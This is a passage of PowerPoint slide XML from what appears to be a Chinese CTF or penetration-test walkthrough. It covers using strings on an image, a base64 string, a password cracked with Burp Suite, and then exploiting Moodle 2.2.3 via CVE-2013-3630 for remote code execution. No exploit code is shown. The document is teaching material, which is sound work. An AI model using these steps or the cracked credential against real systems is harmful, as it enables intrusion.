              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="矩形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C93BD56C-40DC-437C-B2FA-19EF3D791B6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5608955" y="1288415"/>
            <a:ext cx="5909945" cy="998855"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3"/>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3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>strings</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="文本框 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C702F80D-545D-40A0-86E7-82CD4136DC41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5859145" y="2430145"/>
            <a:ext cx="5193030" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>strings命令</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 在对象文件或二进制文件中查找可打印的字符串。字符串是4个或更多可打印字符的任意序列，以换行符或空字符结束。 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>strings命令对识别随机对象文件很有用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="文本框 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18E70E81-6DC0-46E0-A1C6-265FBDAC4685}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536575" y="1769379"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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rPr>
              <a:t>strings for-007.jpg</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32" name="图片 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF410666-83CE-47FE-9F4D-C2E91963BA1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11"/>
          <a:srcRect t="69786" r="12475"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="536575" y="2287270"/>
            <a:ext cx="4495165" cy="1851025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="图片 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3705CD37-1858-498D-A7DC-DD145444E551}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12"/>
          <a:srcRect l="1131" t="978" r="2038" b="2389"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5996305" y="3629025"/>
            <a:ext cx="5158105" cy="2774315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="文本框 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2312AB0E-C01F-4F94-8E89-74EC085EBFB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="410039" y="4403841"/>
            <a:ext cx="4599837" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>从可疑的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>==</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>锁定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Image Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>对应字符串（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>）eFdpbnRlcjE5OTV4IQ==</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>使用Burpsuite破解获得密码：xWinter1995x!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2150116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9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>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13110" y="3510280"/>
            <a:ext cx="2101020" cy="2015089"/>
            <a:chOff x="1048224" y="3047028"/>
            <a:chExt cx="2862843" cy="2991505"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="矩形 1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2" name="矩形 1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13" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="图形 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
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1879055" y="3749229"/>
            <a:ext cx="1569127" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="9600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BD9F68"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>02</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Titre 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4498645" y="4472151"/>
            <a:ext cx="5411787" cy="677814"/>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sz="4800" b="1" spc="600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>漏洞利用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="212986197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漏洞利用：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" spc="300" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>moodle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>版本漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="文本框 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DEF64F0-EEA8-4335-B3D7-9AB65ECF4B36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="499745" y="4706620"/>
            <a:ext cx="4470400" cy="337185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="文本框 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52CCF7F0-5075-4E35-A8A0-9EBA6504DB75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1173945" y="4875212"/>
            <a:ext cx="4064000" cy="886718"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>用管理员账户密码登录网页</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>发现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>moodle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>版本：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Moodle 2.2.3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="图片 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD815AB0-8D8C-4B3E-9562-766D64FE31D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:srcRect r="10331"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="497035" y="2128998"/>
            <a:ext cx="5417820" cy="2324735"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F8D2304-D0E6-450C-A641-87D2D370DDF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:srcRect l="16041" t="2574" r="17206" b="48663"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6505855" y="2128998"/>
            <a:ext cx="4853305" cy="2324100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本框 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14AB5A7D-0076-48E7-84CA-14F5E0AD5E64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6900507" y="4875212"/>
            <a:ext cx="4064000" cy="886718"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>查找可以利用的漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>CVE-2013-3630 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>漏洞可利用</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4180938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漏洞利用：远程代码执行利用漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37999F63-214B-454B-ADE3-48260C42B1F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="755629" y="1276143"/>
            <a:ext cx="10680741" cy="5177820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{092B374F-C447-4ACF-8272-2C7746497BFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6581530" y="4875212"/>
            <a:ext cx="4444433" cy="471219"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
